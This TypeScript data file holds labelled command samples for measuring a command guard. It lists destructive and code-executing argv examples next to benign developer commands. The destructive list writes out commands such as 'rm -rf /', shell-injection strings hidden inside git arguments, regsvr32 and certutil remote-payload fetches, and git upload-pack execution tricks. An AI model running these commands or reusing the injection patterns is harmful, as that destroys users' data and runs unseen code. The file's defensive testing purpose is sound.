/** Hand-built labelled corpora for the guard measurement. Pure data, no assertions. */

export type Mode = 'noshell' | 'shell';

export interface Sample {
  cls: string;
  argv: string[];
  /** which verdict mode the sample is relevant for; default both */
  mode?: Mode;
}

const s = (cls: string, ...argv: string[]): Sample => ({ cls, argv });
const sh = (cls: string, ...argv: string[]): Sample => ({ cls, argv, mode: 'shell' });

/** Every sample here is destructive or executes code the README says the guard blocks (or should). */
export const DESTRUCTIVE: Sample[] = [
  // shell separators / expansion that a retyped --check command would honour (README: "retyped into a shell")
  sh('shell-sep', 'git', 'log', '--format=x & calc'),
  sh('shell-sep', 'git', 'log', '--format=x\nrm -rf src'),
  sh('shell-sep', 'echo', '`rm -rf src`'),
  sh('shell-sep', 'echo', '$(rm -rf src)'),
  sh('shell-sep', 'echo', 'x ^& calc'),
  sh('shell-sep', 'echo', 'x \u0026\u0026 y'),
  sh('expansion', 'rm', '-rf', '~'),
  sh('expansion', 'rm', '-rf', '~/work'),
  sh('expansion', 'rm', '-rf', '$HOME'),
  sh('expansion', 'rm', '-rf', '%USERPROFILE%'),
  sh('expansion', 'rm', '-rf', '$HOME/src'),
  sh('expansion', 'rm', '-rf', '%USERPROFILE%\\x'),
  // git commands that run programs
  s('git-exec', 'git', 'submodule', 'foreach', 'rm -rf x'),
  s('git-exec', 'git', 'bisect', 'run', 'x'),
  s('git-exec', 'git', 'rebase', '-x', 'calc', 'HEAD~1'),
  s('git-exec', 'git', 'rebase', '--exec=calc', 'HEAD~1'),
  s('git-exec', 'git', 'fetch', '--upload-pack=calc', 'origin'),
  s('git-exec', 'git', 'ls-remote', '--upload-pack=calc', 'x'),
  s('git-exec', 'git', 'clone', '--upload-pack=calc', 'a', 'b'),
  s('git-exec', 'git', 'pull', '--upload-pack=calc'),
  s('git-exec', 'git', 'push', '--receive-pack=calc', 'x'),
  s('git-exec', 'git', 'clone', 'ext::calc', 'x'),
  s('git-exec', 'git', 'fetch', 'ext::sh -c calc'),
  s('git-exec', 'git', 'grep', '-O', 'calc', 'x'),
  s('git-exec', 'git', 'diff', '--ext-diff'),
  s('git-exec', 'git', 'difftool', '-x', 'calc'),
  s('git-exec', 'git', 'mergetool'),
  // git commands that destroy work or history
  s('git-destroy', 'git', 'gc', '--prune=now'),
  s('git-destroy', 'git', 'reflog', 'expire', '--expire=now', '--all'),
  s('git-destroy', 'git', 'worktree', 'remove', '-f', 'x'),
  s('git-destroy', 'git', 'rm', '-rf', '.'),
  s('git-destroy', 'git', 'checkout', 'HEAD', 'src'),
  s('git-destroy', 'git', 'checkout', '-B', 'main', 'x'),
  s('git-destroy', 'git', 'switch', '-C', 'main'),
  s('git-destroy', 'git', 'tag', '-d', 'v1'),
  s('git-destroy', 'git', 'branch', '-M', 'x'),
  s('git-destroy', 'git', 'prune'),
  s('git-destroy', 'git', 'branch', '-f', 'main', 'HEAD~5'),
  s('git-destroy', 'git', 'update-ref', '-d', 'refs/heads/main'),
  s('git-destroy', 'git', 'filter-branch', '--tree-filter', 'x'),
  s('git-destroy', 'git', 'log', '--output=src/a.ts'),
  s('git-destroy', 'git', 'diff', '--output=src/a.ts'),
  s('git-destroy', 'git', 'archive', '-o', 'src/a.ts', 'HEAD'),
  s('git-destroy', 'git', 'format-patch', '-o', '../../outside', 'HEAD~1'),
  s('git-destroy', 'git', '--work-tree=/', 'rm', '-rf', '.'),
  s('git-destroy', 'git', 'worktree', 'prune'),
  // plain filesystem destroyers other than rm/mv
  s('fs-write', 'dd', 'if=/dev/zero', 'of=src/a.ts'),
  s('fs-write', 'truncate', '-s', '0', 'src/a.ts'),
  s('fs-write', 'rsync', '-a', '--delete', 'empty/', 'src/'),
  s('fs-write', 'tar', '--remove-files', '-cf', 'a.tar', 'src'),
  s('fs-write', 'cp', '/dev/null', 'src/a.ts'),
  s('fs-write', 'cp', '-f', 'a', '../../outside/b'),
  s('fs-write', 'sed', '-i', 's/a/b/', 'src/a.ts'),
  s('fs-write', 'tee', 'src/a.ts'),
  s('fs-write', 'ln', '-sf', '/etc/passwd', 'src/a'),
  s('fs-write', 'curl', '-o', 'src/a.ts', 'http://x'),
  s('fs-write', 'wget', '-O', 'src/a.ts', 'http://x'),
  s('fs-write', 'shred', '-u', '--', 'src/a.ts', '../../outside/x'),
  s('fs-delete', 'unlink', '../../outside/x'),
  s('fs-delete', 'trash', '../../outside/x'),
  s('fs-delete', 'xcopy', 'a', '../../outside', '/Y'),
  s('fs-delete', 'robocopy', 'a', 'b', '-mir'),
  s('fs-delete', 'reg', 'delete', 'HKCU\\x', '/f'),
  s('fs-delete', 'format', 'D:'),
  s('fs-delete', 'cipher', '/w:C:'),
  s('fs-delete', 'kubectl', 'delete', 'ns', 'x'),
  s('fs-delete', 'docker', 'run', '-v', '/:/h', 'alpine', 'rm', '-rf', '/h'),
  s('disclaimed', 'cargo', 'clean'),
  s('disclaimed', 'make', 'clean'),
  // programs that execute something the guard cannot see (README: "interpreters ... wrappers")
  s('exec-launcher', 'tsx', 'x.ts'),
  s('exec-launcher', 'ts-node', 'x.ts'),
  s('exec-launcher', 'node22', '-e', 'x'),
  s('exec-launcher', 'node20', 'x.js'),
  s('exec-launcher', 'python3.12', '-c', 'x'),
  s('exec-launcher', 'pwsh-preview', '-c', 'x'),
  s('exec-launcher', 'java', '-jar', 'x.jar'),
  s('exec-launcher', 'dotnet', 'x.dll'),
  s('disclaimed', 'go', 'run', 'x.go'),
  s('disclaimed', 'cargo', 'run'),
  s('disclaimed', 'npm', 'run', 'x'),
  s('disclaimed', 'npm', 'test'),
  s('disclaimed', 'npm', 'start'),
  s('disclaimed', 'npm', 'install', 'x'),
  s('disclaimed', 'npm', 'explore', 'x', '--', 'calc'),
  s('disclaimed', 'pnpm', 'run', 'x'),
  s('exec-launcher', 'pnpm', 'create', 'x'),
  s('disclaimed', 'yarn', 'run', 'x'),
  s('exec-launcher', 'yarn', 'create', 'x'),
  s('exec-launcher', 'corepack', 'pnpm', 'dlx', 'x'),
  s('disclaimed', 'bun', 'run', 'x'),
  s('exec-launcher', 'bun', 'x', 'y'),
  s('disclaimed', 'make', '-f', 'evil.mk'),
  s('disclaimed', 'cmake', '-P', 'x.cmake'),
  s('exec-launcher', 'awk', 'BEGIN{system("calc")}'),
  s('exec-launcher', 'fd', '-x', 'rm'),
  s('exec-launcher', 'fd', '--exec', 'rm'),
  s('exec-launcher', 'rg', '--pre', 'calc', 'x'),
  s('exec-launcher', 'ssh', 'host', 'rm -rf /'),
  s('disclaimed', 'msbuild', 'x.xml'),
  s('exec-launcher', 'forfiles', '/c', 'cmd /c del @file'),
  s('exec-launcher', 'wmic', 'process', 'call', 'create', 'x'),
  s('exec-launcher', 'regsvr32', '/s', '/u', '/i:http://x/a.sct', 'scrobj.dll'),
  s('exec-launcher', 'certutil', '-urlcache', '-f', 'http://x', 'a.exe'),
  s('exec-launcher', 'bitsadmin', '/transfer', 'x', 'http://x', 'C:\\x'),
  s('exec-launcher', 'start', 'x'),
  s('disclaimed', 'just', 'x'),
  s('disclaimed', 'gradle', 'clean'),
  s('disclaimed', 'mvn', 'clean'),
  // renamed / lookalike binaries
  s('renamed-rm', '/bin/rm2', '-rf', 'x'),
  s('renamed-rm', 'busybox', 'rm', '-rf', '/'),
  // delete targets: this class the guard DOES claim
  s('delete-claimed', 'rm', '-rf', '/'),
  s('delete-claimed', 'rm', '-rf', '..'),
  s('delete-claimed', 'rm', '-rf', '../../x'),
  s('delete-claimed', 'rm', '-rf', '.git'),
  s('delete-claimed', 'rm', '-rf', '.GIT/HEAD'),
  s('delete-claimed', 'rm', '-rf', '.cws'),
  s('delete-claimed', 'rm', '-rf', 'C:\\Windows'),
  s('delete-claimed', 'rm', '-rf', '\\\\server\\share\\x'),
  s('delete-claimed', 'rm', '-rf', 'src/*'),
  s('delete-claimed', 'rm', '-rf', 'a:b'),
  s('delete-claimed', 'rm.exe.', '-rf', '/'),
  s('delete-claimed', 'mv', 'src', '../../outside'),
  s('delete-claimed', 'find', '.', '-delete'),
  s('delete-claimed', 'find', '.', '-DELETE'),
  s('delete-claimed', 'git', 'clean', '-fdx'),
  s('delete-claimed', 'git', 'reset', '--hard'),
  s('delete-claimed', 'git', 'push', '--force'),
  s('delete-claimed', 'git', 'push', 'origin', '+main'),
  s('delete-claimed', 'git', 'branch', '-D', 'x'),
  s('delete-claimed', 'git', 'stash', 'drop'),
  s('delete-claimed', 'git', '-c', 'alias.x=!calc', 'x'),
  s('delete-claimed', 'bash', '-c', 'rm x'),
  s('delete-claimed', 'node', '-e', 'x'),
  s('delete-claimed', 'npx', 'x'),
  s('delete-claimed', 'env', 'rm', 'x'),
  s('delete-claimed', 'robocopy', 'a', 'b', '/MIR'),
];

/** Everyday developer commands that must keep working. */
export const BENIGN: Sample[] = [
  ['git', 'status'], ['git', 'status', '--short'], ['git', 'log', '--oneline', '-20'], ['git', 'log', '--format=%h; %s'],
  ['git', 'diff'], ['git', 'diff', '--stat', 'HEAD~1'], ['git', 'show', 'HEAD'], ['git', 'branch'], ['git', 'branch', '-a'],
  ['git', 'branch', 'feature/x'], ['git', 'checkout', '-b', 'feature/x'], ['git', 'add', 'src/a.ts'], ['git', 'add', '-A'],
  ['git', 'commit', '-m', 'feat: a; b'], ['git', 'commit', '-m', 'fix: x | y'], ['git', 'push', 'origin', 'main'],
  ['git', 'push', '-u', 'origin', 'feature/x'], ['git', 'pull'], ['git', 'fetch', 'origin'], ['git', 'fetch', '--all', '--prune'],
  ['git', 'stash'], ['git', 'stash', 'list'], ['git', 'remote', '-v'], ['git', 'config', 'user.name'], ['git', 'config', '--get', 'user.email'],
  ['git', 'rev-parse', 'HEAD'], ['git', 'ls-files'], ['git', 'blame', 'src/a.ts'], ['git', 'tag'], ['git', 'describe', '--tags'],
  ['git', 'merge', '--ff-only', 'main'], ['git', 'rebase', 'main'], ['git', 'cherry-pick', 'abc123'], ['git', 'init'],
  ['git', '-C', 'src', 'status'], ['git', 'switch', 'main'], ['git', 'checkout', 'main'], ['git', 'diff', '--name-only'],
  ['git', 'clone', 'https://example.com/x.git'], ['git', 'shortlog', '-sn'], ['git', 'grep', 'TODO'], ['git', 'reflog'],
  ['rm', 'src/old.ts'], ['rm', '-rf', 'dist'], ['rm', '-f', 'tmp.log'], ['rm', '-r', 'build'], ['rm', '-rf', 'node_modules'],
  ['rm', '-rf', './coverage'], ['rm', '--', 'src/-weird.ts'], ['mv', 'a.ts', 'b.ts'], ['mv', 'src/a.ts', 'src/lib/a.ts'],
  ['find', '.', '-name', '*.ts'], ['find', 'src', '-type', 'f'], ['ls'], ['ls', '-la'], ['dir'], ['cat', 'README.md'],
  ['head', '-n', '20', 'a.ts'], ['tail', '-n', '50', 'log.txt'], ['wc', '-l', 'a.ts'], ['grep', '-rn', 'TODO', 'src'],
  ['rg', 'TODO', 'src'], ['rg', '-n', 'foo', '--glob', '*.ts'], ['echo', 'hello'], ['pwd'], ['whoami'], ['hostname'],
  ['tsc', '--noEmit'], ['tsc', '-p', 'tsconfig.json'], ['eslint', 'src'], ['prettier', '--check', 'src'], ['vitest', 'run'],
  ['jest', '--ci'], ['mocha'], ['pytest', '-q'], ['ruff', 'check', '.'], ['mypy', 'src'], ['black', '--check', '.'],
  ['cargo', 'build'], ['cargo', 'test'], ['cargo', 'fmt', '--check'], ['go', 'build', './...'], ['go', 'test', './...'], ['go', 'vet', './...'],
  ['pnpm', 'install'], ['pnpm', 'list'], ['pnpm', 'outdated'], ['npm', 'ci'], ['npm', 'ls'], ['npm', 'audit'], ['npm', 'view', 'zod', 'version'],
  ['yarn', 'install'], ['docker', 'ps'], ['docker', 'images'], ['kubectl', 'get', 'pods'], ['curl', '-s', 'https://example.com'],
  ['diff', 'a', 'b'], ['sort', 'a.txt'], ['uniq', 'a.txt'], ['jq', '.name', 'package.json'], ['tree'], ['du', '-sh', '.'],
  ['mkdir', '-p', 'src/new'], ['touch', 'src/new/a.ts'], ['cp', 'a.ts', 'b.ts'], ['robocopy', 'a', 'b', '/E'], ['xcopy', 'a', 'b', '/E'],
  ['sha256sum', 'a.ts'], ['file', 'a.bin'], ['stat', 'a.ts'], ['which', 'node'], ['where', 'git'],
].filter((a) => a.length > 0).map((argv) => ({ cls: 'benign', argv }));
